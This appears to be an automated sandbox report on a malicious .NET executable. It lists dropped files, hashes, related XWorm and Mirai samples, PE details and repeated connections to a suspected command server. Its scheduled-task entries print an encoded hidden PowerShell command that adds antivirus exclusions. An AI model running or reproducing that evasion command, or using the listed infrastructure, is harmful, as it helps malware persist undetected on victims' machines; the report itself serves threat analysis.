                                                                  • Execution Graph export aborted for target powershell.exe, PID 7056 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • VT rate limit hit for: test.exe
                                                                  TimeTypeDescription
                                                                  07:27:21API Interceptor1x Sleep call for process: test.exe modified
                                                                  07:27:26API Interceptor57x Sleep call for process: powershell.exe modified
                                                                  07:27:27API Interceptor1579046x Sleep call for process: InstallUtil.exe modified
                                                                  12:27:22Task SchedulerRun new task: pebv path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                                                                  12:27:23Task SchedulerRun new task: Product path: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                                                                  12:27:25Task SchedulerRun new task: sgaapu path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  103.230.121.81Filezilla-stage2.exeGet hashmaliciousUnknownBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    iam.nigga.dadFilezilla-stage2.exeGet hashmaliciousUnknownBrowse
                                                                    • 103.230.121.81
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    VPSQUANUSFilezilla-stage2.exeGet hashmaliciousUnknownBrowse
                                                                    • 103.230.121.81
                                                                    rebirth.dbg.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 103.252.20.25
                                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 103.122.177.128
                                                                    la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                    • 154.91.52.33
                                                                    file.exeGet hashmaliciousXWormBrowse
                                                                    • 103.230.121.124
                                                                    file.exeGet hashmaliciousXWormBrowse
                                                                    • 103.230.121.124
                                                                    word.exeGet hashmaliciousXWormBrowse
                                                                    • 103.230.121.124
                                                                    svchost.exeGet hashmaliciousXWormBrowse
                                                                    • 103.230.121.124
                                                                    Chrome.exeGet hashmaliciousXWormBrowse
                                                                    • 103.230.121.124
                                                                    Registry.exeGet hashmaliciousXWormBrowse
                                                                    • 103.230.121.124
                                                                    No context
                                                                    No context
                                                                    Process:C:\Users\user\Desktop\test.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):604672
                                                                    Entropy (8bit):7.935767129377669
                                                                    Encrypted:false
                                                                    SSDEEP:12288:gwHE6uElwjKPq9qgzUstlouX8mhQH5agMnMOHMLM6:gl6ZiePijt2uM1bf
                                                                    MD5:59EAB4D3E8B7C383D6E963256CE603D8
                                                                    SHA1:367AC5A131BBEBCE102B0FC56C3F22224FE61B47
                                                                    SHA-256:EA8724FF42A52834A9AF9C7D3FE10AC6FF1FE8064E4F1E3E519DAF9396A508F0
                                                                    SHA-512:5B64311AE75D93B2F15452EE6AC9A39DD44BC6BEE2880AFFB6F3E4D7A12B98224595055DD6E44D3BCDB0FF808B0AA8ED9F2097228C5CA43B1094828B796095B0
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.................0..0...........O... ...`....@.. ....................................@.................................`O..K....`..p............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc...p....`.......2..............@..@.reloc...............8..............@..B.................O......H..........d\..........@................................................*...(....*..(....*.Z .J.......%.....(....*..0..........8....... ....o....8...... .V.o ....c F[..a~....{....a(....(....o....8(...s......8N.......o......o....o......8...... B... ..sX 0.mia~....{l...a(....(....o....8.....s......8.....(....u....s......8..........s......8.........o....8......o....s......8.............8.......s......8.......(....&8..........o....&8.........o....8......o......8..........9....
                                                                    Process:C:\Users\user\Desktop\test.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):838
                                                                    Entropy (8bit):5.343981685113983
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzeosXE4qdKm:MxHKlYHKh3oRAHKzePHA
                                                                    MD5:9CCD52F7E666DC3225FA8A6D9120C198
                                                                    SHA1:35571A48C9F29765D69EFD69D95669B1A180BBD9
                                                                    SHA-256:965053376DFF2CDD816C41292E23666E3456504A75254130D620C3C5BB94949D
                                                                    SHA-512:8B66F632EEEF894527CD0EBF331E97E158A40668AC6D290F079449A03477542B609C5FA7AE1E6321093860B11CE697E2D4FECA24ADE51DC94608398B9BC81B54
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..
                                                                    Process:C:\Users\user\Desktop\test.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):838
                                                                    Entropy (8bit):5.343981685113983
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzeosXE4qdKm:MxHKlYHKh3oRAHKzePHA
                                                                    MD5:9CCD52F7E666DC3225FA8A6D9120C198
                                                                    SHA1:35571A48C9F29765D69EFD69D95669B1A180BBD9
                                                                    SHA-256:965053376DFF2CDD816C41292E23666E3456504A75254130D620C3C5BB94949D
                                                                    SHA-512:8B66F632EEEF894527CD0EBF331E97E158A40668AC6D290F079449A03477542B609C5FA7AE1E6321093860B11CE697E2D4FECA24ADE51DC94608398B9BC81B54
                                                                    Malicious:true
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):1.1940658735648508
                                                                    Encrypted:false
                                                                    SSDEEP:3:NlllulVmdtZ:NllUM
                                                                    MD5:013016A37665E1E37F0A3576A8EC8324
                                                                    SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                                    SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                                    SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                                    Malicious:false
                                                                    Preview:@...e................................................@..........
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.935767129377669
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:test.exe
                                                                    File size:604'672 bytes
                                                                    MD5:59eab4d3e8b7c383d6e963256ce603d8
                                                                    SHA1:367ac5a131bbebce102b0fc56c3f22224fe61b47
                                                                    SHA256:ea8724ff42a52834a9af9c7d3fe10ac6ff1fe8064e4f1e3e519daf9396a508f0
                                                                    SHA512:5b64311ae75d93b2f15452ee6ac9a39dd44bc6bee2880affb6f3e4d7a12b98224595055dd6e44d3bcdb0ff808b0aa8ed9f2097228c5ca43b1094828b796095b0
                                                                    SSDEEP:12288:gwHE6uElwjKPq9qgzUstlouX8mhQH5agMnMOHMLM6:gl6ZiePijt2uM1bf
                                                                    TLSH:35D41241B6E3CB44C06942FAD0D394AC0BF9EBC739B7D74D388822461D57BD59E2AB84
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.................0..0...........O... ...`....@.. ....................................@................................
                                                                    Icon Hash:00928e8e8686b000
                                                                    Entrypoint:0x494fae
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0xDFD6F372 [Sat Jan 1 08:23:14 2089 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x94f600x4b.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x960000x570.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x980000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x92fb40x93000878eb235ca56ec53904307a7a0ba29b9False0.9521301684736394data7.943479566691634IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x960000x5700x600b56938426c2a5ec9afaf4e1fb56410d1False0.4016927083333333data3.9448791679772106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x980000xc0x200165e821f4921a74434c5aed08e93e260False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_VERSION0x960a00x2e4data0.4283783783783784
                                                                    RT_MANIFEST0x963840x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 13, 2024 13:27:27.857930899 CET4970530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:27.977679968 CET3012049705103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:27.977775097 CET4970530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:28.012420893 CET4970530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:28.132097960 CET3012049705103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:28.132222891 CET4970530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:28.254409075 CET3012049705103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:29.717199087 CET3012049705103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:29.717276096 CET4970530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:29.718128920 CET4970530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:29.834012032 CET4970630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:29.837845087 CET3012049705103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:29.954787016 CET3012049706103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:29.956707001 CET4970630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:29.975915909 CET4970630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:30.095571041 CET3012049706103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:30.095925093 CET4970630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:30.216326952 CET3012049706103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:31.670499086 CET3012049706103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:31.670670986 CET4970630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:31.670802116 CET4970630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:31.787307024 CET4970730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:31.855447054 CET3012049706103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:32.064327002 CET3012049707103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:32.064438105 CET4970730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:32.065171957 CET4970730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:32.185417891 CET3012049707103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:32.185480118 CET4970730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:32.305624008 CET3012049707103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:33.806552887 CET3012049707103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:33.806652069 CET4970730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:33.806835890 CET4970730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:33.912121058 CET4970830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:33.926769018 CET3012049707103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:34.031791925 CET3012049708103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:34.031872988 CET4970830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:34.032568932 CET4970830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:34.152479887 CET3012049708103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:34.152560949 CET4970830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:34.274102926 CET3012049708103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:35.651833057 CET3012049708103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:35.651890039 CET4970830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:35.652036905 CET4970830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:35.757014990 CET4971030120192.168.2.9103.230.121.81
